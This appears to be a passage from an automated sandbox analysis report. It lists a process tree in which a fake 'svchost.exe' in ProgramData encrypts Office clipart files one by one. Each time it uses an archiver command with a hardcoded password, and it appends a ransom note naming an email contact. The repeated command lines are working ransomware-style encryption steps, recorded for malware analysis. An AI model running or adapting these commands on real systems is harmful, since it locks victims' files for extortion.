  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101861.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101863.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101864.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2460
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101867.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145373.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2388
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1204
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145879.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145904.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149118.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1480
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174952.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177806.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1492
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2968
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1876
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:844
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1040
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1564
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2460
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2108
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1220
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2920
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:860
- C:\ProgramData\msvkp\svchost.exe
